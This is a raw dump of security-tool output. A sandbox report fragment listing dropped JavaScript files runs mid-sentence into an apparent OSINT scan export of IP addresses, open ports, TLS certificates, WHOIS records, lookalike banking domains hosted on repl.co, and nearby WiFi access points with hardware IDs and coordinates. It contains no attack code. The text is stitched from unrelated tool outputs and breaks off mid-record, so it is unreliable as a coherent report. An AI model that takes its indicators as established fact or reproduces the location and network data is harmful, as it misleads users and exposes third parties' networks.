Dropped file: "edge_driver.js" - Location: [%TEMP%\\5660_1719137669\\edge_driver.js]- [targetUID: 00000000-00005660]\n Dropped file: "bnpl_driver.js" - Location: [%TEMP%\\5660_724844775\\bnpl_driver.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005660]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "105.0.0.0" found in string "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in 104.21.7.179 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.190.129 2022-12-18 00:12:14 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.97.1 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2083 104.21.19.243 2022-12-18 00:09:29 Open TCP Port No LeakIX 0 0 2 0 None 81.88.52.232:443 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None ProCare-Guest (Net ID: 00:01:21:1C:30:F0) 37.7803446,-122.3906132 2022-12-18 00:16:53 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 2022-12-18 00:21:54 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 104.21.7.179 2022-12-18 00:18:13 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.4:80 188.114.97.0/24 2022-12-18 00:06:31 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.147.230:80 172.67.147.230 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None bancosneomc.itaumcneonm.repl.co 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None RyanLG (Net ID: 00:01:36:4F:9A:F0) 37.7803446,-122.3906132 2022-12-18 00:17:00 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "39680", "accept-ranges": "bytes", "last-modified": "Wed, 15 Dec 2021 09:50:30 GMT", "connection": "keep-alive", "etag": "\"61b9ba66-9b00\"", "date": "Sun, 18 Dec 2022 00:16:49 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "application/javascript"} http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js 2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 7626679.com 172.67.147.230 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a93e8099a021ab-DUS Content-Encoding: gzip 172.67.137.37 2022-12-18 00:04:11 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.0 2022-12-18 00:11:30 Physical Address No GLEIF 0 0 3 0 None C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 Identity Digital Inc. 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:2053 188.114.96.0/24 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2087 172.67.169.215 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aa1c8a4ee62aa2-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2082 104.21.19.243 2022-12-18 00:12:47 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.3 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js http://webmail.zerotwo-best-waifu.online/ 2022-12-18 00:20:19 Netblock Membership No RIPE 0 0 3 0 None 81.88.48.0/20 81.88.48.102 2022-12-18 00:06:53 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.fr plague.fun 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None pichinchaonline.ecuados.repl.co 34.149.204.188 2022-12-18 00:31:03 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.club plague.fun 2022-12-18 00:06:37 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.1:80 188.114.96.1 2022-12-18 00:06:25 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: f4:f0:fa:2f:ab:28:c3:7d:0e:b0:02:5f:9f:06:b1:0c Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 20 21:18:06 2022 GMT Not After : Dec 19 21:18:05 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a6:17:c6:04:fb:e2:e0:59:ac:2e:a8:d3:b0:cc: 12:7c:68:dc:b2:74:54:cb:14:94:48:00:d7:f9:63: a8:43:04:57:b8:d8:a0:8d:0c:ed:15:24:a6:66:77: fa:81:64:4b:6c:41:75:b8:97:36:6e:5b:da:67:e2: 1f:14:ff:22:80:94:08:62:df:99:ca:03:43:05:fa: 46:20:d2:9f:df:8f:a7:7e:8a:69:3e:61:96:51:a5: 93:54:e6:93:09:12:ee:a0:14:e5:d1:a8:c9:e9:fa: d3:4c:7b:01:0c:f0:43:a2:18:af:ea:4d:2d:73:6b: fc:fe:22:70:fd:8b:38:07:1a:44:ea:aa:73:f7:42: fd:26:ff:19:14:c3:ba:2e:83:df:a5:e8:35:43:c3: 56:62:20:4f:1a:d6:af:9d:f0:12:fa:41:e7:ab:85: a2:9e:64:93:1b:3c:57:ef:8f:c6:5f:df:42:50:d5: f1:17:6f:31:6f:b4:6c:fb:1e:7b:34:59:34:4c:69: c7:d2:93:4e:db:d9:1a:7a:6d:e6:93:2a:64:15:ed: c4:3a:75:b6:54:5f:b8:a0:42:be:d0:a2:11:79:c4: 02:b5:1e:d5:ff:ce:26:ac:1d:35:ee:3b:73:af:e0: c8:33:74:1d:fd:8a:af:cd:f1:a2:f0:e7:bb:ed:d2: e3:ab Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 76:B0:8A:AE:37:8A:CB:36:D4:AF:F1:76:3B:26:4B:80:29:2E:E6:F4 X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/hLavwz_Rggs CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/utt2fHukd6E.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 52:14:6a:4e:2b:75:62:73:64:24:b2:8a:7d:11:88:06:c3:32: 4a:9a:de:a1:10:f4:93:90:6a:a2:95:d1:cd:b2:04:8b:94:ec: 43:0f:1d:ae:f0:36:ba:63:ee:4c:69:d3:9e:2e:c7:0d:a2:65: 8c:8c:88:31:23:86:8f:5f:89:6c:f3:d9:6b:3e:a4:ce:6d:f1: 35:cf:71:7f:5a:ea:a5:2e:71:df:3a:e9:4c:6a:cd:d8:a6:e2: ed:71:cc:b0:51:52:d0:f2:ea:2f:50:48:1e:fb:77:b9:80:d2: b1:f9:f2:63:e7:27:19:87:fd:31:6a:57:59:2f:96:dc:42:c2: 0e:46:7d:61:d8:a0:25:3b:09:31:25:6c:99:32:42:ee:25:a0: 4e:38:48:a8:80:b2:cc:ec:7d:35:a4:ee:26:b6:ba:55:01:2c: 5f:05:79:6d:cd:16:00:88:e0:eb:47:b5:7a:d4:78:86:12:7e: 3f:9b:7d:a2:6b:6c:d1:15:d3:af:cd:f3:19:89:8a:b7:67:e4: d2:d4:05:42:b4:ab:86:be:e9:a6:5a:15:05:c5:06:c4:bf:fb: 23:73:86:a8:25:01:30:9f:b4:58:13:81:8f:d5:59:84:04:c9: a1:fb:10:79:14:0c:79:84:d4:9d:0c:8c:3b:a3:c0:29:77:2f: 09:ef:9b:19 misogyny.wtf 2022-12-18 00:15:47 Non-Standard HTTP Header No Strange Header Identifier 0 0 4 0 None keep-alive: timeout=5 {"content-length": "1554", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"612-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:18 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"} 2022-12-18 00:09:35 Co-Hosted Site No HackerTarget 0 0 2 0 None imdmorat.ga 104.21.28.240 2022-12-18 00:31:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: PLAGUE.ONL Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-11-06T10:11:01Z Creation Date: 2019-11-05T05:26:43Z Registry Expiry Date: 2023-11-05T05:26:43Z Registrar Registration Expiration Date: Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Domains By Proxy, LLC Registrant State/Province: Arizona Registrant Country: US Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain Name: plague.onl Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-11-06T10:10:59Z Creation Date: 2019-11-05T05:26:43Z Registrar Registration Expiration Date: 2023-11-05T05:26:43Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR394993769 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Admin ID: CR394993781 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Tech ID: CR394993775 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:10:05 Web Server No URLScan.io 0 1 1 0 None Apache zerotwo-best-waifu.online 2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None setupdns.net webmail-fr.setupdns.net 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1f17f8a712aa5-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243 2022-12-18 00:12:42 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.27.242', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/19', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 104.21.27.242 2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.237 81.88.52.232 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 104.21.27.242 2022-12-18 00:17:54 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.96.0] https://www.virustotal.com/en/ip-address/188.114.96.0/information/ 188.114.96.0 2022-12-18 00:08:39 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.3 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ac0f6eeada2a09-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:04:11 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.96.1:443 188.114.96.1 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.184 34.149.204.188 2022-12-18 00:21:44 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 2606:4700:3031::6815:7b3 2022-12-18 00:08:32 Raw Data from RIRs No LeakIX 0 0 1 0 None {u'Services': None, u'Leaks': None} misogyny.wtf 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpeedStream (Net ID: 00:01:24:F0:B4:05) 37.7803446,-122.3906132 2022-12-18 00:21:06 BGP AS Membership No Censys 0 0 2 0 None 13335 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 043320 (Net ID: 00:02:2D:04:33:20) 37.7803446,-122.3906132 2022-12-18 00:03:12 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: e5:46:5a:b1:fb:47:13:cc:0e:4e:81:45:49:c8:68:c3 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 1 20:47:45 2022 GMT Not After : Nov 30 20:47:44 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:b8:a8:f1:ca:81:88:62:ce:b7:cb:e5:5f:70:5d: a9:d6:19:67:8b:9a:69:7c:3e:b0:1a:bf:ee:8e:41: 4b:60:c8:0e:71:b0:ee:9d:06:89:ea:42:9b:af:7c: 48:a8:dc:72:38:b2:40:b2:8b:0c:71:d6:cf:8c:4c: 53:f8:67:e4:7f:60:a0:99:71:a1:b8:43:c5:ac:14: 39:cc:43:b8:4b:37:35:d7:ce:16:69:79:a3:d5:53: e2:6e:2c:f7:a6:1f:8c:b4:ec:ce:6e:53:98:9b:ab: 62:08:cf:8d:70:8f:b2:0a:bd:98:3d:36:e1:f9:e1: bf:19:54:07:8d:e9:35:76:fe:c6:0f:41:8f:3b:e5: a6:09:2f:df:f1:e2:47:95:78:fa:a2:a2:32:98:b0: 41:0c:82:5d:b0:b9:fd:29:cd:b7:42:24:54:13:89: 34:19:e6:93:92:d4:e6:b9:ad:42:59:2a:d2:95:8b: c8:08:b5:b5:eb:f0:04:bf:bc:a5:6c:07:1a:d0:ac: 9c:9c:c8:69:a8:dd:20:73:eb:78:6f:cc:33:40:f2: ca:45:5b:11:72:b1:86:45:2f:03:d1:de:78:a2:24: 3c:ac:18:42:19:ac:73:ef:fd:c7:72:14:e3:2c:e5: 40:80:36:85:b0:76:ca:de:d3:9c:2a:c2:82:26:af: 6a:25 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5B:64:C5:97:48:7A:C9:8D:92:D2:CA:90:DF:5B:FF:61:46:87:B1:6E X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/V-CqIJuvA-8 CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/EE-IMN5cLuw.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 2d:4d:db:39:e5:eb:23:3e:18:2b:77:dd:21:24:63:de:69:88: 0f:9e:17:b2:35:af:6e:93:1a:96:fe:0c:a3:37:af:2e:d6:43: e8:24:ee:ae:4c:2a:e5:4b:57:72:90:16:3d:61:16:54:dd:c6: 9c:eb:22:67:30:01:07:2e:49:c0:01:b6:3c:14:29:95:a2:9a: a1:63:db:08:fd:03:00:f4:54:5c:d8:4a:fc:6f:5b:26:4d:7d: 6e:43:ae:76:9e:d3:e1:69:3d:94:79:64:6c:31:03:86:51:a5: c7:ce:d8:16:24:9c:a4:8a:b7:c9:ff:56:da:53:fb:84:4b:f0: d1:e0:4e:0a:3c:53:54:98:01:77:fa:79:d4:ce:5b:1d:b2:a6: 10:93:20:f8:1c:8a:2c:af:5f:43:c4:d8:0d:53:e8:bb:41:fb: d1:7b:18:4c:9f:51:81:8a:2f:c8:da:90:df:f4:e7:d4:28:0d: 5b:1d:b4:f6:e5:90:01:1a:30:ba:7d:6c:bf:48:e6:2b:64:ea: 3a:0d:16:71:ad:c2:81:17:88:59:f8:8c:af:16:6c:9d:56:99: 20:bf:39:ed:60:8b:d6:02:c0:16:b4:76:c6:80:59:91:f8:59: 46:79:a6:23:8f:c6:43:b4:16:64:4e:77:83:33:cb:a5:f2:01: 0c:3c:cd:87 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:7C:7A) 37.780462,-122.390564 2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:443 188.114.96.0/24 2022-12-18 00:23:12 Raw Data from RIRs No CRXcavator 1 0 1 0 None [{"platform": "Chrome", "version": 